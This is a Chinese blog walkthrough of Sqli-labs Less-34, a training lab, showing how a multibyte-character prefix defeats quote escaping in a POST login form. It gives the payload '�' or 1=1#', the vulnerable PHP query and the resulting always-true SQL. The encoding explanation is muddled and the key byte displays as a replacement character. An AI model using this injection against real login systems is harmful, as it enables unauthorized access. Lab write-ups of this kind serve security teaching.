Sqli-labs less 34
2016-08-11 22:14
363 查看
Less-34
本关是post型的注入漏洞,同样的也是将post过来的内容进行了 ' \ 的处理。由上面的例子可以看到我们的方法就是将过滤函数添加的 \ 给吃掉。而get型的方式我们是以url形式提交的,因此数据会通过URLencode,如何将方法用在post型的注入当中,我们此处介绍一个新的方法。将utf-8转换为utf-16或 utf-32,例如将 ' 转为utf-16为 �' 。我们就可以利用这个方式进行尝试。我们用万能密码的方式的来突破这一关。
例如上图中直接提交username:�' or 1=1#
Password:随便乱填
可以看到下面显示正常登陆。
原始的sql语句为
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
此时sql语句为
SELECT username, password FROM users WHERE username='�' or 1=1#' and password='$passwd' LIMIT 0,1
Explain:SELECT username, password FROM users WHERE username='�' or 1=1起到作用,后面的则被#注释掉了。而起作用的的语句不论select选择出来的内容是什么与 1=1进行or操作后,始终是1。
相关文章推荐
- Sqli-labs less 35
- Sqli-labs less 36
- Sqli-labs less 37
- Oracle将查询结果保存到文本txt中
- MYSQL注入天书之stacked injection
- SqlServer四种排序:ROW_NUMBER()/RANK()/DENSE_RANK()/ntile() over()
- SqlServer四种排序:ROW_NUMBER()/RANK()/DENSE_RANK()/ntile() over()
- Oracle EBS 常用查询 - 价格表查询
- Sqli-labs less 38
- SQL 约束,事务,触发器,存储引擎,多表查询
- MYSQL企业常用架构与调优经验分享
- Sqli-labs less 39
- 解决Visual C++ Redistributable for Visual Studio 2015的安装问题
- Sqli-labs less 40
- Sqli-labs less 41
- Sqli-labs less 42
- Sqli-labs less 43
- MySQL 5.6优化
- Sqli-labs less 44
- Sqli-labs less 45